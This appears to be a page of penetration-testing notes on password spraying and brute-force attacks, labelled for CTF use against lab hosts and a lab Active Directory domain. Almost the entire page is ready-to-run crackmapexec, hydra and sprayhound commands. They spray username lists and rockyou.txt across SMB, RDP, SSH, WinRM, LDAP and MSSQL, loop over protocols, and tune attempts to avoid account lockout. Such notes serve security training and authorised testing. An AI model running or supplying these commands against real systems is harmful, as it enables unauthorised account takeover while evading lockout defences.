Password Attack

Password Spray

Only CTF - SMB (139,445) - Checking login == password using wordlist

# Try same username and password
crackmapexec smb $RHOST -u usernames.txt -p usernames.txt
crackmapexec smb $RHOST -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success

# Try different protocols with no brute force 
for p in 'ftp' 'ssh' 'smb' 'winrm' 'ldap' 'mssql'; do cme $p $RHOST -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success; done

# RDP 
hydra -V -f -L usernames.txt -P usernames.txt rdp://10.0.2.5 -V

# Try adding some updates on lower and upper cases (e.g. Ryan, ryan, RYAN)

tr '[:lower:]' '[:upper:]' < users.txt > users2.txt
tr '[:upper:]' '[:lower:]' < users.txt >> users2.txt
crackmapexec smb $RHOST -u users2.txt -p users2.txt

AD Password Spray

# A single password spray for multiple users 
cme smb $RHOST -u usernames.txt -p June2013 
cme smb $RHOST -u usernames.txt -p Summer2020 
# Multiple password spray for multiple users
cme smb $RHOST -u usernames.txt -p passwords.txt

# No bruteforce possible with this one as 1 user = 1 password
cme smb 192.168.56.11 -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-succes

Sprayhound

# https://github.com/Hackndo/sprayhound
# --lower  User as pass with lowercase password
sprayhound -U usernames.txt -d north.sevenkingdoms.local -dc 192.168.56.11 --lower

# We could try sprayhound with a valid user to avoid locking account (option -t to set the number of try left)
sprayhound -U usernames.txt -d north.sevenkingdoms.local -dc 192.168.56.11 -lu hodor -lp hodor --lower -t 2

Bruteforce Attack

cme + rockyou.txt

# Bruteforcing with limited number of passwords. 
cme smb 192.168.56.11 -u usernames.txt -p passwords.txt

# RDP 
hydra -V -f -L usernames.txt -P passwords.txt rdp://10.0.2.5 -V

# Try different protocols with bruteforce 
for p in 'ftp' 'ssh' 'smb' 'winrm' 'ldap' 'mssql'; do cme $p $RHOST -u usernames.txt -p usernames.txt --continue-on-success; done

# You might need to clean up rockyou.txt and use the cleaned one.
iconv -f UTF-8 -t UTF-8 -c < /usr/share/wordlists/rockyou.txt | sed 's/[^[:print:]]//g' > cleaned_rockyou.txt
# Check a password for a user within 5 min 
timeout 5m crackmapexec smb $RHOST -u freedy -p /usr/share/wordlists/rockyou.txt
timeout 5m crackmapexec smb $RHOST -u calvin -p /usr/share/wordlists/rockyou.txt
timeout 5m crackmapexec smb $RHOST -u johana -p /usr/share/wordlists/rockyou.txt

PreviousKerberos Attack w/o passwordNextHydra

Last updated